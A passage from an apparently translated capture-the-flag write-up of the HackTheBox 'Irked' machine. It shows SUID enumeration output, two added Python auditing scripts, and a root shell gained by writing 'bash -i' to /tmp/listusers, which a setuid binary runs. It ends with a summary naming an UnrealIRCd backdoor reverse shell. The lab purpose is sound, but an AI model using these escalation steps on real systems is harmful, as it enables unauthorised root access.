    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/misc
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/man
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/ca-certificates
    drwxrwsr-x 3 root staff 4096 Sep  5  2022 /usr/local/share/emacs
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/emacs/site-lisp
    drwxrwsr-x 7 root staff 4096 Sep  5  2022 /usr/local/share/sgml
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/declaration
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/entities
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/stylesheet
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/misc
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/dtd
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/fonts
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/sbin
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/bin
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/games
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/src
    drwxr-s--- 2 root dip 4096 May 11  2018 /etc/chatscripts
    drwxr-s--- 2 root dip 4096 May 11  2018 /etc/ppp/peers
    drwxr-sr-x 29 man root 4096 May 25 10:31 /var/cache/man
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hu
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ko
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fr
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/de
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/gl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ro
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sk
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fi
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/id
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_CN
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/cs
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ja
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/tr
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt_BR
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hr
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/es
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sv
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/it
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/nl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ru
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_TW
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/el
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/da
    drwxrwsr-x 2 root mail 4096 May 11  2018 /var/mail
    drwxr-s--- 2 Debian-exim adm 4096 May 25 10:26 /var/log/exim4
    drwxrwsr-x 2 root staff 4096 Jan  9  2017 /var/local
    -rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
    -rwxr-sr-x 1 root shadow 34424 May 27  2017 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
    -rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
    -rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
    -rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
    -rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount
    drwxr-sr-x 3 root systemd-journal 60 May 25 10:21 /run/log/journal
    drwxr-s--- 2 root systemd-journal 60 May 25 10:21 /run/log/journal/58827ab6b7d24c318344087f9268b9b5

Focusing on /usr/bin/viewuser from here is no different from before. You have to have the intuition that /usr/bin/viewuser is suspicious.
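The intuition can be replaced by a baseline check: on Debian every default setuid binary is shipped by a package, so `dpkg -S` answers "no path found" only for files someone put there by hand. (The parenthetical question above has a plain answer too: on a directory the setgid bit just makes new files inherit the directory's group, as with the `staff`-owned tree under /usr/local; it executes nothing, so those entries can be dropped from the review.) The auditor below is an added example, not part of this issue or of linuxprivchecker; it parses the `ls -l`-style lines above, keeps only setuid-root regular files, and reports those the package database does not claim. The `dpkg -S` wrapper is for a real Debian host; the sample lines and the `CONSTRUCTED_DPKG` table are constructed stand-ins so the block runs offline.

```python
import subprocess

# Constructed sample: a handful of the "[+] SUID/SGID Files and Directories"
# lines shown in this issue, in the ls -l form linuxprivchecker prints.
SAMPLE_PRIVCHECKER = """\
    -rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
    -rwxr-sr-x 1 root tty 26240 Mar 29  2015 /usr/bin/wall
    -rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
    -rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
    drwxrwsr-x 10 root staff 4096 Sep  5  2022 /usr/local
    -rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
"""

# Constructed stand-in for `dpkg -S` answers on this host (offline demo only).
CONSTRUCTED_DPKG = {
    "/usr/lib/openssh/ssh-keysign": "openssh-client",
    "/usr/bin/wall": "bsdutils",
    "/usr/bin/passwd": "passwd",
    "/bin/su": "login",
}


def parse_ls_line(line):
    """Parse one ls -l style line into a dict, or None if it does not fit."""
    parts = line.split(None, 8)  # path is the 9th field and may contain spaces
    if len(parts) < 9:
        return None
    mode, _links, owner, group, size, _mon, _day, _year, path = parts
    return {
        "path": path, "mode": mode, "owner": owner, "group": group, "size": int(size),
        "is_dir": mode[0] == "d",
        # 's' ('S' when the execute bit is absent) in the owner / group execute slot
        "setuid": mode[3] in "sS",
        "setgid": mode[6] in "sS",
    }


def dpkg_owner(path):
    """Return the Debian package that ships path, or None (wraps `dpkg -S`)."""
    r = subprocess.run(["dpkg", "-S", path], capture_output=True, text=True)
    return r.stdout.split(":", 1)[0] if r.returncode == 0 else None


def audit_setuid_root(lines, owner_lookup=dpkg_owner):
    """Return paths of setuid-root regular files that no package claims.

    Setgid directories are skipped: the bit only affects group inheritance
    of new files there and grants no privilege to execute anything.
    """
    suspects = []
    for line in lines:
        e = parse_ls_line(line)
        if e is None or e["is_dir"] or not e["setuid"] or e["owner"] != "root":
            continue
        if owner_lookup(e["path"]) is None:
            suspects.append(e["path"])
    return suspects


if __name__ == "__main__":
    for p in audit_setuid_root(SAMPLE_PRIVCHECKER.splitlines(), CONSTRUCTED_DPKG.get):
        print("setuid-root binary not owned by any package:", p)
```

On a live host you would feed it `find / -perm -4000 -type f -exec ls -l {} +` and the default `dpkg_owner`; the same check belongs in a file-integrity baseline, since a new setuid-root file outside the package database is exactly the change an administrator wants alerted on.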

roaris commented 1 month ago

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: not found

It said /tmp/listusers doesn't exist, so I'll just create it and see.

djmardov@irked:~$ touch /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: Permission denied

The Permission denied is presumably because it has no execute permission. After adding execute permission, the error went away.

djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
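What the three runs above demonstrate is the actual defect in viewuser: a setuid-root program hands a fixed path under the world-writable /tmp to `sh`, so whoever creates that file decides what runs as root. The check below is an added example, not viewuser's source or anything from this issue; it encodes the rules a privileged program (or an auditor reading its `strings` output) should apply to a helper path before trusting it: every path component must exist, must be owned by the trusted uid, must not be a symlink, and must not be writable by group or others. A missing final component is itself a finding, because a writable parent directory lets anyone supply it.

```python
import os
import stat


def entry_risks(path, mode, uid, trusted_uid=0):
    """Reasons one path component is unsafe for a privileged program to trust.

    mode and uid are st_mode/st_uid from lstat(), so a symlink is judged as a
    symlink rather than as whatever it currently points to.
    """
    risks = []
    if stat.S_ISLNK(mode):
        risks.append(f"{path}: symlink")
    if uid != trusted_uid:
        risks.append(f"{path}: owned by uid {uid}, not uid {trusted_uid}")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        # Deliberately conservative: the sticky bit on /tmp is not credited,
        # since it does not stop anyone from creating a file that is missing.
        risks.append(f"{path}: writable by group/others")
    return risks


def privileged_exec_risks(path, trusted_uid=0):
    """Walk every prefix of path (/, /tmp, /tmp/listusers) and collect risks."""
    path = os.path.abspath(path)
    prefixes, cur = [], path
    while True:
        prefixes.append(cur)
        parent = os.path.dirname(cur)
        if parent == cur:
            break
        cur = parent
    risks = []
    for p in reversed(prefixes):  # root first, so parent findings come first
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            risks.append(f"{p}: missing (anyone who can write its parent can create it)")
            break
        risks.extend(entry_risks(p, st.st_mode, st.st_uid, trusted_uid))
    return risks


if __name__ == "__main__":
    # The path viewuser runs on this box (constructed run; results depend on
    # the local filesystem). A sane helper would live in a root-owned,
    # non-writable directory, and better still be an absolute path that is
    # compiled in rather than looked up at runtime.
    for r in privileged_exec_risks("/tmp/listusers"):
        print(r)
```

Applied to /tmp/listusers on a normal system the walk reports /tmp as group/other-writable and the helper as either missing or user-owned, which is the whole privilege escalation in two lines of output; the same function is a reasonable unit test for any setuid program's hard-coded helper paths.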

roaris commented 1 month ago

So if /tmp/listusers launches a shell, a shell starts with root privileges. Got root.txt.

djmardov@irked:~$ echo "bash -i" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2024-05-25 10:21 (:0)
djmardov pts/0        2024-05-25 13:19 (10.10.14.50)
root@irked:~# pwd
/home/djmardov
root@irked:~# cd /root
root@irked:/root# cat root.txt
1eeb03bc31a3b7a53f2e391db6d86bf2

roaris commented 1 month ago

Solution summary

  1. Scan all ports with nmap.
  2. Use the irssi command to identify that the UnrealIRCd version is 3.2.8.1.
  3. Use the UnrealIRCd 3.2.8.1 backdoor to run a reverse shell. Note that it doesn't work unless the command is base64-encoded before sending.
  4. Notice /home/djmardov/Documents/.backup.
  5. Extract the information hidden by steganography in the image served on port 80, using the steghide command and the password written in /home/djmardov/Documents/.backup.
  6. The ssh login password comes out, so log in via ssh as djmardov and get user.txt.
  7. Enumerate files with setuid set and suspect /usr/bin/viewuser.
  8. /usr/bin/viewuser executes /tmp/listusers, so make /tmp/listusers launch a shell, get a shell with root privileges, and get root.txt.